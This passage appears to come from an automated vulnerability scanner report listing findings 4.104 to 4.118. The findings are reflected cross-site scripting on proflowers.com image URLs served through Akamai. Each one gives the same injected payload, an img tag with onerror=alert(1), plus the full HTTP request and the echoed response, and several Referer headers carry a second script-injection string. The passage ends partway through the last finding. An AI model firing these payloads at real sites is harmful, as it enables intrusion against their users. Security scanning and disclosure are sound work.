The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1cbee<img%20src%3da%20onerror%3dalert(1)>5763a4a3885 was submitted in the REST URL parameter 9. This input was echoed as 1cbee<img src=a onerror=alert(1)>5763a4a3885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ1cbee<img%20src%3da%20onerror%3dalert(1)>5763a4a3885?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:36 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000001125X_023117_W1_SQ1cbee<img src=a onerror=alert(1)>5763a4a3885
4.104. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 74452<img%20src%3da%20onerror%3dalert(1)>3add74ea4c6 was submitted in the REST URL parameter 9. This input was echoed as 74452<img src=a onerror=alert(1)>3add74ea4c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ74452<img%20src%3da%20onerror%3dalert(1)>3add74ea4c6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000009D209_087948_W1_SQ74452<img src=a onerror=alert(1)>3add74ea4c6
4.105. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9fe05<img%20src%3da%20onerror%3dalert(1)>4969de73a20 was submitted in the REST URL parameter 9. This input was echoed as 9fe05<img src=a onerror=alert(1)>4969de73a20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W19fe05<img%20src%3da%20onerror%3dalert(1)>4969de73a20?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:28 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000009D183X_087921_W19fe05<img src=a onerror=alert(1)>4969de73a20
4.106. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4fef5<img%20src%3da%20onerror%3dalert(1)>efadcde1f33 was submitted in the REST URL parameter 9. This input was echoed as 4fef5<img src=a onerror=alert(1)>efadcde1f33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF4fef5<img%20src%3da%20onerror%3dalert(1)>efadcde1f33?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=300&hei=350 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:27 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF4fef5<img src=a onerror=alert(1)>efadcde1f33
4.107. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c2ba5<img%20src%3da%20onerror%3dalert(1)>fbc47c0020f was submitted in the REST URL parameter 9. This input was echoed as c2ba5<img src=a onerror=alert(1)>fbc47c0020f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PFc2ba5<img%20src%3da%20onerror%3dalert(1)>fbc47c0020f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:51 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000M519_VA0606_W1_PFc2ba5<img src=a onerror=alert(1)>fbc47c0020f
4.108. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ea72b<img%20src%3da%20onerror%3dalert(1)>f25cd72b5d0 was submitted in the REST URL parameter 9. This input was echoed as ea72b<img src=a onerror=alert(1)>f25cd72b5d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PFea72b<img%20src%3da%20onerror%3dalert(1)>f25cd72b5d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:48 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PFea72b<img src=a onerror=alert(1)>f25cd72b5d0
4.109. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload db8a2<img%20src%3da%20onerror%3dalert(1)>dc2c61a3c73 was submitted in the REST URL parameter 9. This input was echoed as db8a2<img src=a onerror=alert(1)>dc2c61a3c73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PFdb8a2<img%20src%3da%20onerror%3dalert(1)>dc2c61a3c73?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:52 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000R212_VA1137_W1_PFdb8a2<img src=a onerror=alert(1)>dc2c61a3c73
4.110. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5add8<img%20src%3da%20onerror%3dalert(1)>51d9c6eb19b was submitted in the REST URL parameter 9. This input was echoed as 5add8<img src=a onerror=alert(1)>51d9c6eb19b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF5add8<img%20src%3da%20onerror%3dalert(1)>51d9c6eb19b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4incampanula_dblbskt09_PF5add8<img src=a onerror=alert(1)>51d9c6eb19b
4.111. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a996e<img%20src%3da%20onerror%3dalert(1)>05540ad9da6 was submitted in the REST URL parameter 9. This input was echoed as a996e<img src=a onerror=alert(1)>05540ad9da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PFa996e<img%20src%3da%20onerror%3dalert(1)>05540ad9da6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4inmoneytree_lotus09_PFa996e<img src=a onerror=alert(1)>05540ad9da6
4.112. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f94e9<img%20src%3da%20onerror%3dalert(1)>2cc41beea4f was submitted in the REST URL parameter 9. This input was echoed as f94e9<img src=a onerror=alert(1)>2cc41beea4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PFf94e9<img%20src%3da%20onerror%3dalert(1)>2cc41beea4f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PFf94e9<img src=a onerror=alert(1)>2cc41beea4f
4.113. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 75728<img%20src%3da%20onerror%3dalert(1)>1d0b0a9d30d was submitted in the REST URL parameter 9. This input was echoed as 75728<img src=a onerror=alert(1)>1d0b0a9d30d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF75728<img%20src%3da%20onerror%3dalert(1)>1d0b0a9d30d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF75728<img src=a onerror=alert(1)>1d0b0a9d30d
4.114. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b7dea<img%20src%3da%20onerror%3dalert(1)>38121d80567 was submitted in the REST URL parameter 9. This input was echoed as b7dea<img src=a onerror=alert(1)>38121d80567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PFb7dea<img%20src%3da%20onerror%3dalert(1)>38121d80567?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:12 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6incallapnk_victin11_PC1601_PFb7dea<img src=a onerror=alert(1)>38121d80567
4.115. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 874d0<img%20src%3da%20onerror%3dalert(1)>5db3fd9eabd was submitted in the REST URL parameter 9. This input was echoed as 874d0<img src=a onerror=alert(1)>5db3fd9eabd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF874d0<img%20src%3da%20onerror%3dalert(1)>5db3fd9eabd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF874d0<img src=a onerror=alert(1)>5db3fd9eabd
4.116. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 494e2<img%20src%3da%20onerror%3dalert(1)>b57ae1753bf was submitted in the REST URL parameter 9. This input was echoed as 494e2<img src=a onerror=alert(1)>b57ae1753bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF494e2<img%20src%3da%20onerror%3dalert(1)>b57ae1753bf?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:55 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF494e2<img src=a onerror=alert(1)>b57ae1753bf
4.117. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c5572<img%20src%3da%20onerror%3dalert(1)>cbdab6a22f3 was submitted in the REST URL parameter 9. This input was echoed as c5572<img src=a onerror=alert(1)>cbdab6a22f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PFc5572<img%20src%3da%20onerror%3dalert(1)>cbdab6a22f3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6ingardtop_fpc08_PFc5572<img src=a onerror=alert(1)>cbdab6a22f3
4.118. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34857<img%20src%3da%20onerror%3dalert(1)>40952913b8 was submitted in the REST URL parameter 9. This input was echoed as 34857<img src=a onerror=alert(1)>40952913b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF34857<img%20src%3da%20onerror%3dalert(1)>40952913b8?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
